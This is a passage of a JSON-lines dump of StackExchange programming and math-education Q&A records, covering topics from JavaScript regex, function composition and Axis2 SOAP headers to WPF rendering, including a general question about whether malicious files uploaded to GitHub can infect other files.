text.match(\/^.+?(\\r\\n\\r\\n|\\n\\n)(.+)\/s)\nconsole.log(matches)<\/code>\n\nOr, for environments that don't support the <code>s<\/code> modifier, use the character set <code>[\\s\\S]<\/code> to match any character:\n\n<code>let text = `asdf\n\nasdfsdf\nasdf\n\nasdf\n23423\n\ndsfddfff`\nlet matches = text.match(\/^[\\s\\S]+?(\\r\\n\\r\\n|\\n\\n)([\\s\\S]+)\/)\nconsole.log(matches)<\/code>\nComment: Is it in ecmascript2018 already? I still see the s modifier as stage 4 proposal, unsure where it is already implemented.\nComment: You're right, it's probably too new to rely on fully, I mistakenly assumed it was OK because it worked in my browser.\nComment: I'm using it in node and it is supported there\nComment: Probably a better pattern would be `\/(?:r?\\n){2}([\\s\\S]+)\/`. I doubt the first `^[\\s\\S]*?` makes any sense if that substring is not going to be used.\nComment: another way to match all characters: `[^]`\nComment: @Thomas I don't think `[^]` is great to use because it only works in Javascript (or, at least, is invalid syntax in other common regex flavors) - it can easily lead to confusion, while `[\\s\\S]`'s meaning should be clear everywhere.\n","meta":{"source":"stackoverflow","title":"RegExp not getting everything after the first two new lines","dup_signals":{}},"subset":"stackexchange"} +{"text":"Composite functions\n\nQuestion: How would you describe the existence of a composite function $f(g(x))$in terms of range of $g$ and domain of $f$ . Does range of $g$ need to be subset of domain of $f$ or is it sufficient if the two sets have intersection only? \nI used to define composite function if range of $g$ is a subset of domain of $f$ and in that case domain of the composite function is same as domain of the function $g$ but I have come across questions where only intersection exists. In that type of situation domain of composite function can not be the domain of $g$. I have this issue related to high school mathematics. Could you please help me to find the most appropriate way of describing the issue to the students relevant to their level of studies . \nFor further clarification here you have examples \n\nLet $f(x) = x^2$ and $g(x) = \\sqrt{x-1}$.\nHere range of $g$ is a subset of domain of $f $, therefore $f(g(x)) = x -1$ exists. Now the issue is can you say $f(g(0))= - 1$ because 0 is not in the domain of $g$?\n\nLet $f(x)= x + 2$ and $g(x) = 1\/(x - 1)$.\n Here range of $f$ is not a subset of domain of $g$ , now what about $g(f(x)) = 1\/(x+1)$, how can you explain the way to obtain domain of this composite function because here that is not the same domain of $f$?\n\nDo we need to treat finding expression for $g(f(x))$ and finding composite function $g(f(x))$ in two different ways?\nEdited \nBy going through the suggested answers following are the conclusions I could able to make , \n\nWhen the terms function or domain not mention in the question we can treat$ f(g(x))$ as an expression and substitute any real value to $x$ if output is real. \nWhen the domain of $f$ and $g$ are given $f(g(x))$ can be defined if range of $g$ is a subset of domain of $f$. \nWhen domain of $f$ and $g$ are not given we have to determine the domain of $g$ such that range of $g$ is a subset of domain of $f$ and range of $f(g(x))$ should be determined according to the selected domain of $g$. \nIf you have any exceptions please mention it in your answers or comment about it so that we can make the final conclusion.\nComment: This is definitely a teaching question: which convention is better to teach and how to explain it to students.\nComment: This is a question about mathematics, not about math education.\nComment: @TomKern thanks for understanding the real meaning and the value of the issue. I too believe this is much better platform to clear doubts related to different approaches in teaching.\nAnswer: Before addressing some of the issues directly, let me mention what I think is the standard approach in mathematics. A function is typically defined together with its domain and codomain, so saying \"function $f$\" is a shorthand for \"function $f \\colon A \\to B$\" (where $B$ is the codomain and potentially the range $f(A)$ is a proper subset of $B$). And then, the standard way of introducing composition is to require two functions $f \\colon A \\to B$, $g \\colon B \\to C$ to have matching (co)domains and let $g \\circ f \\colon A \\to C$, $(g \\circ f) (x) = g(f(x))$.\nOf course, this is not the only option. If $f \\colon A \\to B$ and $g \\colon B' \\to C$ don't have matching (co)domains but $B' \\subseteq B$ (typically $B = \\mathbb{R}$), you can still define $g \\circ f$ on the set $A' := f^{-1}(B')$ by $(g \\circ f) \\colon A' \\to C$, $(g \\circ f)(x) = g(f(x))$. It's mostly a pedagogical choice. If one wanted to be pedantic and stick to the previous definition, one would just have to use the composition $g \\circ f|_{A'}$ (with $f$ replaced by its restriction).\nIt's probably best to stick with whatever your primary reference for the subject uses.\n\nNow, there's a type of problems where a function is only given by an expression (say, $\\frac{1}{x}$) and the student is required to find the set of all $x$'s for which the expression makes sense, the so called natural domain (here it would be $\\mathbb{R} \\setminus \\{0\\}$).\nHowever, it's important to make a distinction between a function and an expression. Formally, in problems like the one above you are given an expression and asked to make it into a function. I'd suspect not all students are ready for such subtleties, but there are some advantages:\n\nThis is how it works in mathematics, but even more importantly, in programming. There, functions are usually statically typed, meaning that you specify the type of their input and output. If you try to compose two functions: $$ f \\colon \\mathbb{N} \\to \\mathbb{R}, \\ f(n)=\\sqrt{n} \n\\quad \\text{with} \\quad \ng \\colon \\mathbb{N} \\to \\mathbb{N}, \\ g(x)=x^2, $$\nin a typical programming language, you should expect an error when trying to compute $g(f(4))$, even though the reason in somewhat artificial (at least from the mathematical perspective).\nThe distinction can clear up some confusion in your example 1. If $f(x) = x^2$ and $g(x) = \\sqrt{x-1}$, then actually we deal with functions $g \\colon [1,\\infty) \\to \\mathbb{R}$ and $f \\colon \\mathbb{R} \\to \\mathbb{R}$, and their composition is by definition $f \\circ g \\colon [1,\\infty) \\to \\mathbb{R}$, $(f \\circ g)(x) = f(g(x)) = x-1$. Of course, given the expression $x-1$ out of context, we would ascribe $\\mathbb{R}$ as its natural domain. Avoiding unnecessary subtleties, one could also summarize it as follows: the natural domain of the composition $f \\circ g$ may be larger than the natural domain of $g$.\n\nI hope it also sheds some light on how you could explain points 2 and 3.\nComment: @JanakaRodrigo I really cannot answer, as there are at least two ways to interpret the words \"you can\" (in principle, I can substitute anything anywhere, the problem is in interpreting the result). If $f(g(x))$ is your shortcut for the function composition $f \\circ g$, then **no**, as explained in the answer. If $f(g(x))$ stand for the expression obtained by substituting one expression into another (which is basically a composition, but treated algebraically), then possibly **yes** (if only the resulting expression makes sense for such $x$).\nComment: @StevenGubkin Can you elaborate? I don't know what monads are or what DNE means, but I'd be interested in knowing what you had in mind. Maybe you can write it as a separate answer?\nComment: I don't feel like writing up an answer but I am using \"DNE\" for \"Does not exist\" (or \"error\"). You can basically adjoin a single element \"DNE\" to every set. Then functions which map DNE to DNE correspond to partial functions. Check out https:\/\/ncatlab.org\/nlab\/show\/maybe+monad.\nComment: It's also worth pointing out that in a lot of mathematics we pretend to be using one of the above definitions for function and function composition, but in reality we're just playing silly buggers and doing whatever we feel like, assuming the reader is smart enough to provide the necessary definitions themself. In such a way that the results match a sensible interpretation.\nComment: Do you mean when f(x) and g(x) are given as expressions without mentioning domains, you can substitute any value for x in f(g(x)) ?\nComment: One can also use the \"maybe monad\" type approach to partial functions. This is essentially equivalent to joining \"DNE\" to each codomain. Then define composition to send always send a \"DNE\" to \"DNE\".\nComment: @Micha\u0142Mi\u015bkiewicz do you need to interchange $B$ and $B'$ in 15th line of your answer?\nComment: @JanakaRodrigo I think it's OK the way it is. This is the situation where e.g. $f(x)=x+2$, $g(x)=\\frac{1}{x}$ (with their natural domains) and $g \\circ f$ only defined on a subset of the domain of $f$.\nComment: @Micha\u0142Mi\u015bkiewicz do you mean either way is ok or the way you have mentioned only. What about when you interchange $x+2$ and $1\/x$ in your example?\nComment: I don't understand exactly what is the alternative way. Do you mean the case when $f \\colon A \\to B$, $g \\colon B' \\to C$ and additionally $B \\subseteq B'$? I didn't mention it, but in this case there's no ambiguity in defining the composition, and if one is pedantic again, one should define it as the composition $g \\circ i \\circ f$, where $i \\colon B \\to B'$ is simply the inclusion.\nAnswer: I initially found requiring the range of $g$ being a subset of the domain of $f$ to be the more appealing option, but having thought about it more, I now think that any two real functions should be composable. This is based on two principles:\n\nThe key takeaway skill from talking about domains is that students should be able to recognize when an expression exists or doesn't exist for various $x$. There shouldn't be extra rules for dealing with functions for students to memorize. As such:\nFunctions should not behave differently from ordinary algebra: students can write algebraic expressions that don't exist for any $x$, so they should also be able to write $f(g(x))$ when it doesn't make sense for any $x$.\n\nOf course, the most important principle is to agree with whatever your textbook says, so that students don't get confused when they reference it.\nComment: This is pretty much the minimal understanding of functions I expect students to have in the US when enrolling in calculus in college. Whether it is the understanding I wish they had is another matter: you teach the students you get. For instance, in calculus, I usually have to explain $(\\sqrt x)^2$ has a restricted domain. I don't know whether in other countries students usually obtain a more rigorous understanding of functions. Of course in the US, there is variation in level of rigor, level of proficiency, and with the holes in their backgrounds.\nComment: I suggest just as to find expression for f(g(x)) you don't have to think about whether the range of g is a subset of domain of f or not but what about when you refer the function f(g(x) .I think here considering that condition may be important.\nComment: Could you clarify what you mean by \"but\" in the first sentence? If you compose two functions $f,g:\\mathbb{R} \\to \\mathbb{R}$, then you're in the situation described in the first part of the sentence: the range of $g$ is a subset of $\\mathbb{R}$, which is in turn the domain of $f$.\nComment: Whoops! I mean partial functions. I was specifically trying to avoid talking about functions that have inputs\/outputs other than real numbers.\nComment: @JochenGlueck as you agree function f(g(x) exists, what about the value of f(g(0)) because 0 is not in the domain of g but you can find f(g(0)) by substituting 0 for the expression f(g(x)) that is x -1. These kind of questions asked in high school grade 10 .\nComment: @Raciquel , the way we do it our curriculum is by introducing domain whenever it is not given in real value functions. There we need to take a set of real numbers which when substituted for $x $give real values as outputs . According to that convention domain of $f$ is \u211d and domain of $g$ is set of real numbers not less than 1.\nAnswer: I think the answer by Michal Mi\u015bkiewicz does an excellent job addressing issues, and captures the formal mathematical perspective.\nThe distinction between the formality of \"function with domain\" and the more laissez-faire perspective of \"expressions\" is an important pedagogical issue. When I teach composition in precalculus and come to this issue, I like to refer to the \"function with domain\" as a rule typically given by an algebraic expression along with a demon who prevents evaluation at values not in the domain. This is akin to Maxwell's demon, the proverbial gatekeeper of the Second Law of Thermodynamics.\n\nSome of my more artistic students enjoy drawing their creative renditions of gatekeepers of functions domains. Often the characteristics of the demon reflect the name of the function--\"square root\" inspires some to draw a demon holding a mandrake with square roots. Having students draw domain demons so I can share them with the class seems to help students retain the idea that functions have domains. When I grade exams, I sometimes see more sketches that students draw in the margins.\nWhen the demon goes to sleep, the function becomes an expression and that's when we can play fast and loose. When the demon for $(f(x)=x^2,\\ x\\in {\\bf R})$ goes to sleep, we can square all sorts of things such as matrices, mandrake roots, etc.\nComment: @JanakaRodrigo We use the \"implied\" domain for each expression. We have $\\left(f(x),{\\bf R}\\right)$, $\\left(g(x),\\{x\\in{\\bf R}, x\\ne -1\\}\\right)$, $\\left( h(x)=\\frac{8}{x-1},\\ x\\in{\\bf R}, x\\ne1\\}\\right)$. The gremlin for $f$ has an easy job, and gets paid for doing nothing. \n\nThe gremlin for $g$ gets paid to watch for $x=-1$ and shoot it out of the air whenever it tries to sneak into $g$. The gremlins for $g$ and $h$ are mirror twins.\nComment: When domains or the functions terms are not mentioned we can just treat $f(g(x)) $as expression, but what about when those terms are used in the question. How could you explain the following issue which I got from review exercise in high school grade 10. If $f(x)= x-2 $and $g(x) = 8\/(x +1) $find $g(f(x)) $and state the domain ? In this question domain of$ f $and $g$ not given.\nComment: As a conclusion can we say if domains given of the functions $f $and $g $such that range of $g $is not a subset of domain of $f$ , composite function$ fog(x) $can not be defined but if domains not given we can define those in order to exist the composite function.\n","meta":{"source":"matheducators.stackexchange","title":"Composite functions","dup_signals":{}},"subset":"stackexchange"} +{"text":"Web service (JAX-WS) client in different package\n\nQuestion: Should look like a stupid question, but I have the following problem.\nThere's an external web service, WSDL is available. My task is to call it's methods from another enterprise application (running on WebSphere 8.5)\nUsing Rational Application Developer, I generated Web service client classes into the application's project, specifying the application's package, which DIFFERS from the web service's one. Web service's method returns a POJO, which is a wrapper for ArrayList.Then I make a call to web service, using generated calsses in the following way:\n<code>package com.mycompany.services.external;\n\nimport com.mycompany.services.external.client.SomeCommonService;\nimport com.mycompany.services.external.client.SomeCommonServiceService;\nimport com.mycompany.services.external.client.IdsList;\n\n final QName COMMONSERVICE_QNAME = new QName(\"http:\/\/webService.othercompany.com\/\", \"SomeCommonServiceService\");\n\n String strUrl = \"http:\/\/....\";\n String query = \"\/universal [@Barcode=\\\"000111\\\"]\";\n\n URL serviceUrl = new URL(strUrl);\n SomeCommonServiceService service=new SomeCommonServiceService(serviceUrl, COMMONSERVICE_QNAME);\n SomeCommonService port = service.getSomeCommonServicePort();\n IdsList itemsIds = port.getItemsIdsByQuery(query);\n<\/code>\nAnd as a result the last line of code, where the method is invoked, causes an error: \n\n[1\/17\/17 21:55:39:758 MSK] 00000497 SystemErr R CIWEB Error:\n [admin(unknown) @ 10.253.32.24]\n com.ibm.ecm.util.PluginUtil.invokeService()\n javax.xml.ws.WebServiceException: javax.xml.bind.JAXBException:\n com.mycompany.services.external.client.IdsList is not known to this\n context\n\nTaking a look into the generated package-info.java the following mapping can be seen:\n<code>@javax.xml.bind.annotation.XmlSchema(namespace = \"http:\/\/webService.othercompany.com\/\")\npackage com.mycompany.services.external.client;\n<\/code>\nIf I leave original option (not changing default package) while generating client - the same problem and the same error. But in this case, if I pack generated client into a separate JAR and use it as a shared library for my application on WebSphere server - then all works fine! But that's not acceptable for some reasons.\nCould somebody be so pleasant to hepl me solve the problem?\nAnswer: I used to work with Web Services Base on WSDL:\nExample: http:\/\/www.dgii.gov.do\/wsMovilDGII\/WSMovilDGII.asmx?wsdl\nOf course using MAVEN, I use this pluging\n<code><plugins>\n <plugin>\n <groupId>org.apache.cxf<\/groupId>\n <artifactId>cxf-codegen-plugin<\/artifactId>\n <version>3.1.5<\/version>\n <executions>\n <execution>\n <id>generate-sources<\/id>\n <phase>generate-sources<\/phase>\n <configuration>\n <sourceRoot>${basedir}\/src\/main\/java\/<\/sourceRoot>\n <wsdlOptions>\n <wsdlOption>\n <wsdl>http:\/\/www.dgii.gov.do\/wsMovilDGII\/WSMovilDGII.asmx?wsdl<\/wsdl>\n <packagenames>\n <packagename>com.hectorvent.consultadgii<\/packagename>\n <\/packagenames>\n <\/wsdlOption>\n <\/wsdlOptions>\n <\/configuration>\n <goals>\n <goal>wsdl2java<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n <\/plugins>\n<\/code>\n","meta":{"source":"stackoverflow","title":"Web service (JAX-WS) client in different package","dup_signals":{}},"subset":"stackexchange"} +{"text":"Color 2 cells width and 3 cells height when clinking on a TD element\n\nQuestion: I'm looking for a way to make a grid (for now using Table, but soon in div).\nLet's sais I click on the first cell (x,y = 1,-1) I want the background color to change for 2 cells width and 3 cells height. (Total of 6 cells changed)...\nIf it's easier to do it using div, go ahead... using jQuery please! :)\nI really don't know how to do this and if someone can put me on the path or give me a code that should do it... or better, a tutorial XD...\nI really appreciate your help, 100 times thanks\nEDIT:\nWhat i'm trying to do actually here is an invisible grod make a system comparable to rts-like games, where the building is transparent and follow the mouse but it's attached to the grid when you move, and on clikc the bulding is droped (no transparency)... Explaining this just so you can have a little visual here.\nComment: What do you want then, table or divs. Both require substantially different approaches...\nComment: Div if preferable since table is deprecated.. :)\nAnswer: The following is for div (as it's the long term goal):\nFirstly, I made a little markup that will be like a sort of table.\nThe html is:\n<code><div id=\"overall\">\n <div class=\"row\">\n <div class=\"cell col0\"><\/div><div class=\"cell col1\"><\/div><div class=\"cell col2\"><\/div><div class=\"cell col3\"><\/div> \n <\/div>\n <div class=\"row\">\n <div class=\"cell col0\"><\/div><div class=\"cell col1\"><\/div><div class=\"cell col2\"><\/div><div class=\"cell col3\"><\/div>\n <\/div>\n <div class=\"row\">\n <div class=\"cell col0\"><\/div><div class=\"cell col1\"><\/div><div class=\"cell col2\"><\/div><div class=\"cell col3\"><\/div> \n <\/div>\n <div class=\"row\">\n <div class=\"cell col0\"><\/div><div class=\"cell col1\"><\/div><div class=\"cell col2\"><\/div><div class=\"cell col3\"><\/div> \n <\/div> \n<\/div>\n<\/code>\nWith the following css:\n<code>.row{\n height:25px;\n}\n.cell{\n width:25px;\n height:100%;\n display:inline-block;\n border:1px solid black;\n}\n<\/code>\nSo it has a table like display (it's a bunch of row composed of cells, cells in a same column share a class).\nTo do what you want, it looks like you'll need to associate a click function to each <code>.cell<\/code>.\nTo do so is easy, using <code>$(\".cell\").click(function(){});<\/code>\nNow, it's time to complete the function.\nNow the next step is coloring the cell you'll need to color. To add the coloration we'll use a special class (this way we can change more things easily):\n<code>.clickedCell{\n background:red;\n}\n<\/code>\nThe hardest part is to select the 6 cells. Numerous way can be used (for example we could have a grid of id like A1, A2, B1, B2 and select them using id) and the efficiency\/design depends heavily on the markup you'll have for your divs. \nThe way I'd do that is the following:\n\nRetrieving the class of the column of my cell : \n<code>var cl=$(this).attr(\"class\");\nvar col=\".\"+\/col\\d\/.exec(cl)[0];\n<\/code>\nRetrieving the parent of current div <code>var parent=$(this).parent();<\/code>\nMaking a jQuery object containing the 3 cells in the current colomn:\n<code>listOfCell=$(this);\nlistOfCell=listOfCell.add(parent.next().children(col));\nlistOfCell=listOfCell.add(parent.prev().children(col));\n<\/code>\nNote that the add function returns a new collection, thus we need to assign the return value.\nAdding the 3 next cells to that object <code>listOfCell=listOfCell.add(listOfCell.next());<\/code>\nAdding the class <code>listOfCell.addClass(\"clickedCell\");<\/code>\n\nAnd it's over :)\nA working example here: http:\/\/jsfiddle.net\/KZFzd\/1\/\nNote that:\n\nAs said before, the function depends heavily on the markup used.\nThe example does not handle the deletion of previously selected cells. It's easy and left as an exercise to the reader.\nIt does not handle the special case of the cells on the side, it just change the background of the cell that would be changed if the grid was greater. This case is left as an exercise to the reader.\nIt does not check the existence of next\/previous parents because jQuery returns an empty jQuery object when nothing matches, and therefore, methods can be called on it, even if it has no effects.\nThe example can be compacted in many ways, but is left as is for readability purposes.\n\nHope that helps.\nEDIT:\nIn order to answer to your comment, the new fiddle to handle a specified size: http:\/\/jsfiddle.net\/KZFzd\/3\/\nI added two input that let you specify the size. You'll probably need to change that in your code <code>:)<\/code>.\nI also added the class removal to clean the display.\nSo the two main change are that now, we're using two <code>for<\/code> loops to add cells. And the clicked cell is the top left corner of the rectangle.\n\nthe first one:\n<code>for (i=1;i<y;i++){\n listOfCell=listOfCell.add(par.children(col));\n par=par.next();\n}\n<\/code>\nIt's just iterating from one parent to another to reach the desired height. (and the first parent assignation is now the next one directly. <code>par=$(this).parent().next()<\/code>\nthe second one:\n<code>for (i=1;i<x;i++){\n listOfCell=listOfCell.add(listOfCell.next());\n}\n<\/code>\nIt's just iterating to add the next elements to reach the desired width.\n\nNote that:\n\nWe're using the fact that there are no double in a jQuery list in the width.\nWe're iterating starting from 1 and not 0, because our starting <code>listOfCell<\/code> is already a 1*1 cell\nYou can easily start from others corner if you change the use of <code>next()<\/code> to <code>prev()<\/code> in one loop or\/and the other.\nIt still does not handle the side cases.\nComment: Wow Py, I like you so much! It's amazing!... But I just notify, is it possible to make the width and height using variable? So we can choose 4x4 or 2x6 or 1x2 ? The objective is to be able to color cell only once using different patern, don't know if it's possible and if your up to help, even if you already helped alot. Thanks for your answer again!!\nComment: Yeah i think it's doable, i'll post a new fiddle a soon as possible.\n","meta":{"source":"stackoverflow","title":"Color 2 cells width and 3 cells height when clinking on a TD element","dup_signals":{}},"subset":"stackexchange"} +{"text":"Infecting files on GitHub\n\nQuestion: Suppose one uploads (carelessly or purposefully) a file with a malicious payload to their Github account (some pdf document, picture, etc.). Could this payload somehow be executed on the Github servers (through preview or alike) and corrupt (infect) any other good files stored there (the years of important work one would like to keep)? And would it be safe to delete the suspicious file and move on with the rest of the data in the github account? A non-technical person might be tempted to wipe everything and start clean, but that would be overkill, right?\nComment: This would be the same as your email attachment question if your focus is solely on the Github server side. And like your other question, it's the syncing of the files locally that is the problem. Github doesn't \"execute\" the files one uploads.\nAnswer: You seem not to understand how computers works in general, what operating systems are, what they do, and what the HTTP server is.\nThe simple act of uploading or downloading anything to or from the Internet does not entail any code execution. You're basically moving bytes from one storage to another one. These bytes are not automatically executed unless you instruct them to, e.g. by launching a downloaded exe or creating a script which processes them.\n","meta":{"source":"security.stackexchange","title":"Infecting files on GitHub","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can I use a badge from angular material design doc?\n\nQuestion: I found a badge on this page. I want to have a digit (I assume, the text \"2)) within this nice circle (I'd like to set up a color as well or use some default one): like the very top example from that page.\nThey say, the code should be:\n<code><mat-icon matBadge=\"22\" matBadgePosition=\"above after\">home<\/mat-icon>\n<\/code>\nBut <code><div><mat-icon matBadge=\"22\" matBadgePosition=\"above after\">home<\/mat-icon><\/div><\/code> doesn't work. I believe I should wrap it inside <code><md-content><\/code> and stuff like that, is it a good idea?\nIn my project I wrap anything inside <code><div><md-menu><md-button><\/code>, but right here I can't see this kind of tags.\nComment: You're looking at the wrong documentation site.\nAnswer: You seem to be mixing up AngularJS Material with Angular Material.\nUnfortunately, there's no such feature for a badge if you're using AngularJS 1.x Material.\nAnswer: You can use angular-material-badge, which works with AngularJS.\n","meta":{"source":"stackoverflow","title":"How can I use a badge from angular material design doc?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Simple css override\n\nQuestion: I have the following css:\n<code>.wrapper {\n display: inline-block;\n margin-top: 60px;\n padding: 15px;\n width: 100%;\n}\n<\/code>\nI want to create another class which inherit all <code>wrapper<\/code> properties and overrides the <code>width<\/code> property:\n<code>.wrapper .extended {\n width: 150% !important;\n}\n<\/code>\nAnd tried to use that in my HTML like:\n<code><section class=\"wrapper extended\"> \n<\/code>\nBut unfortunately that doesn't work.\nHow can I correct my code ?\nComment: lol, remove the space between your classes\nComment: you are going for the child's, concatenate that.\nAnswer: They are two classes of same element. Remove the space:\n<code>.wrapper.extended {\n width: 150% !important;\n}\n<\/code>\nGiving <code>.wrapper .extended<\/code> means, you are selecting a child <code>.extended<\/code> under <code>.wrapper<\/code>. Giving <code>.wrapper.extended<\/code> is you are selecting an element with both <code>.wrapper<\/code> and <code>.extended<\/code> classes. Hope it is clear.\nComment: @PraveenKumar you explain well !!\nAnswer: Remove space between <code>.wrapper<\/code> <code>.extended<\/code> class\n<code>.wrapper.extended {\n width: 150% !important;\n}\n<\/code>\ncss selectors\nAnswer: You can't add a space between these 2 classes. <code>.wrapper .extended<\/code>\nIt will be considered as it's child element, but it is not. Use this\n<code>.wrapper.extended {\n width: 150% !important;\n}\n<\/code>\nAnswer: Remove space between <code>.wrapper<\/code> <code>.extended<\/code> class\nPlease add this method <code>.wrapper.extended<\/code> \nAnd css like this:\n<code>.wrapper.extended {\n width: 150% !important;\n}\n<\/code>\nHope it is clear.\n","meta":{"source":"stackoverflow","title":"Simple css override","dup_signals":{}},"subset":"stackexchange"} +{"text":"W1035 Return value of function 'Test' might be undefined unexpectedly appears after adding a try-finally block\n\nQuestion: I have an unexpected W1035 on compiling:\n\n[dcc32 Warning] Unit1.pas(40): W1035 Return value of function 'Test'\nmight be undefined\n\n<code>function CheckFn() : Boolean;\nbegin\n Result := True;\nend;\n\nfunction Test() : Boolean;\nbegin\n try\n if(not CheckFn()) then\n raise Exception.Create('Error Message');\n\n Result := True;\n finally\n\n end;\nend;\n<\/code>\nIf I remove the <code>try-finally<\/code> block, then the warning disappears.\n<code>function Test() : Boolean;\nbegin\n if(not CheckFn()) then\n raise Exception.Create('Error Message');\n\n Result := True;\nend;\n<\/code>\nWhy is this happening? (Bug?)\nComment: Similar problem with an exception raised in `try-finally` block: `var Tmp : Integer; begin try raise Exception.Create('Invalid value!'); finally end; ShowMessage(IntToStr(Tmp)); end;`. It raises a warning on compiling _W1036 Variable 'Tmp' might not have been initialized_\nAnswer: Let's analyse <code>Test<\/code>.\n\nIf <code>CheckFn<\/code> raises an exception, you immediately go to the <code>finally<\/code> clause, and then you leave the function without returning a value.\nOtherwise, if <code>CheckFn<\/code> returns <code>True<\/code>, you will return <code>True<\/code> from the function.\nOtherwise, if <code>CheckFn<\/code> returns <code>False<\/code>, you will raise an exception and immediately go to the <code>finally<\/code> clause and then you leave the function without returning a value.\n\nHence, in all cases when this function does return a value, it is defined (specifically, it is <code>True<\/code>). Therefore, the compiler is wrong to emit this warning.\nAnd, indeed, in Delphi 10.4, no warning is produced for this code.\n(Or, just possibly, did you confuse <code>finally<\/code> with <code>except<\/code>? If so, the compiler is right.)\nComment: No, I didn't confused, it's really a `finally`\nComment: Then it's a bug in the compiler!\nComment: I'm glad to hear that it has been already fixed in newer IDEs. I'll add an useless initialization with a todo-comment for removing it as soon as I will upgrade my IDE\nComment: FWIW the fix for this particular issue happened somewhen during the 10.2.x version (10.1.2 gives the bogus W1035, 10.2.3 does not)\n","meta":{"source":"stackoverflow","title":"W1035 Return value of function 'Test' might be undefined unexpectedly appears after adding a try-finally block","dup_signals":{}},"subset":"stackexchange"} +{"text":"Axis2 problem in setting SOAPAction HTTP header\n\nQuestion: I am trying co connect to a 3'rd party SOAP web service. It seems that the service can work when the HTTP SOAPAction header is an empty String (\"\"). This is the snippet of the wsdl:\n<code><wsdl:binding name=\"detailsRequestMessage\" type=\"tns:UssdPortType\">\n <soap:binding style=\"document\" transport=\"http:\/\/schemas.xmlsoap.org\/soap\/http\"\/>\n <wsdl:operation name=\"details\">\n <soap:operation soapAction=\"\"\/>\n <wsdl:input>\n <soap:body use=\"literal\"\/>\n <\/wsdl:input>\n <wsdl:output>\n <soap:body use=\"literal\"\/>\n <\/wsdl:output>\n <\/wsdl:operation>\n<\/wsdl:binding>\n<\/code>\nWhere you see the soapAction=\"\"\nI generated a stubusing the Axis2 (1.5) wsdl2java.\nI was hoping to get the following (the successful output when running with SoapUI):\n<code>POST \/details HTTP\/1.1\nAccept-Encoding: gzip,deflate\nContent-Type: text\/xml;charset=UTF-8\nSOAPAction: \"\"\nUser-Agent: Jakarta Commons-HttpClient\/3.1\nHost: some.host\nContent-Length: 323\n<\/code>\nBut instead I am getting:\n<code>POST \/details HTTP\/1.1\nContent-Type: text\/xml; charset=UTF-8\nSOAPAction: \"http:\/\/some.url\/wsussd\/ussdtypes\/UssdPortType\/detailsRequest\"\nUser-Agent: Axis2\nHost: some.host\nContent-Length: 300\n<\/code>\nDoes anyone has any idea what is the problem or how do I set the soapAction in the program.\nThanks,\nRonen\nAnswer: rperez wasn't entirely clear with his answer.\nI have found https:\/\/issues.apache.org\/jira\/browse\/AXIS2-4264 which claims the issue was fixed in 1.6.0, but I still have problems in 1.6.2\nHowever, this does work:\n<code>stub._getServiceClient().getOptions().setProperty(org.apache.axis2.Constants.Configuration.DISABLE_SOAP_ACTION, true);\n<\/code>\nAnswer: Have a look at the answer to this question...you may be able to find similar code in your generated stubs.\nIf that's the case, then I think you can set the action (according to the API):\n<code>serviceClient = new RPCServiceClient();\nOptions options = serviceClient.getOptions();\noptions.setAction(\"\");\n<\/code>\nI think the action is handled differently depending on the SOAP version. To specify a different version:\n<code>options.setSoapVersionURI(\n org.apache.axiom.soap.SOAP11Constants.SOAP_ENVELOPE_NAMESPACE_URI);\n<\/code>\n(or the SOAP12 version of the constant).\nHope that helps.\nComment: I tried that with no luck.\nthe thing that did it was to set the properties of the option .\nThanks\n","meta":{"source":"stackoverflow","title":"Axis2 problem in setting SOAPAction HTTP header","dup_signals":{}},"subset":"stackexchange"} +{"text":"Add Bulk Notes to Contacts\n\nQuestion: I have about 200 contacts that I need to add a bulk note to. I can add bulk activities using CiviRules, but I can't find a way to add a bulk note.\nDoes anyone have any ideas or know of an extension that would do this?\nAnswer: You can do this by creating a profile with a note field, Update multiple contacts from Actions in search results and then copying the note to each contact with the little copy button beside the Note heading (this is assuming you're trying to add the same note to each contact).\nAnswer: Contact import can do this. You just need to first export a list of their contact ids, then add a column with your note.\nOn the import screen choose Update for duplicates (the rule is irrelevant - can leave blank). On the mapping screen choose ContactID and Note.\n","meta":{"source":"civicrm.stackexchange","title":"Add Bulk Notes to Contacts","dup_signals":{}},"subset":"stackexchange"} +{"text":"What's the optimum way to draw high number of dots?\n\nQuestion: We are building a graphical application, we need to draw dots on the canvas background, as we have a feature like Snap To Grid\nOf course, user can set the distance between snapping dots, so, if we have a canvas of size 1024 x 1024, with 5 pixels between each dot, we will have around 41775 dot! \nWhat's the recommended way to render this high number of dots on the canvas ? we need it to be as fast as possible.\nAnswer: WPF doesn't have a direct method to draw pixels on a Canvas. The optimal way to implement it would be with Image and a WriteableBitmap source. Take a look at the code below. It has two functions: drawGrid1 and drawGrid2. On my machine, the first function (draws Ellipse element) takes 6 seconds. The latter function takes 50 milliseconds.\nThe code below is just for illustration. You could cache the WritebaleBitmap, and you should be sensitive (if your scenario requires) changes in the width or height (or, just create a very big bitmap). If you need even more performance, and you are OK with unsafe code, you can call WritebaleBitmap.Lock, then get WriteableBitmap.BackBuffer, and modify the back buffer manually. At the end, call WriteableBitmap.AddDirtyBuffer to invalidate the entire rectangle. It is also possible that if your Grid has only two colors, you can achieve even more performance, by using a palette.\nMore about WriteableBitmap: http:\/\/msdn.microsoft.com\/en-us\/library\/system.windows.media.imaging.writeablebitmap(VS.85).aspx\nXAML:\n<code><Window\n x:Class=\"SO.MainWindow\"\n xmlns=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\/presentation\"\n xmlns:x=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\"\n Height=\"1000\" Width=\"1000\"\n Title=\"SO Sample\"\n Loaded=\"Window_Loaded\"\n >\n <Canvas x:Name=\"x_canvas\">\n <Border Canvas.Left=\"4\" Canvas.Right=\"4\" Width=\"120\" Height=\"32\" Background=\"White\" >\n <TextBlock x:Name=\"x_txt\" VerticalAlignment=\"Center\" \/>\n <\/Border>\n <\/Canvas>\n<\/Window>\n<\/code>\nCode Behind:\n<code>private void Window_Loaded( object sender, RoutedEventArgs e ) {\n DateTime start = DateTime.Now;\n \/\/drawGrid1( );\n drawGrid2( );\n DateTime end = DateTime.Now;\n TimeSpan span = end - start;\n x_txt.Text = span.ToString( );\n}\n\nprivate void drawGrid2( ) {\n \/\/ Create a new image\n Image img = new Image( ); \n RenderOptions.SetBitmapScalingMode( img, BitmapScalingMode.NearestNeighbor );\n RenderOptions.SetEdgeMode( img, EdgeMode.Aliased );\n\n \/\/ Add this image to the canvas\n 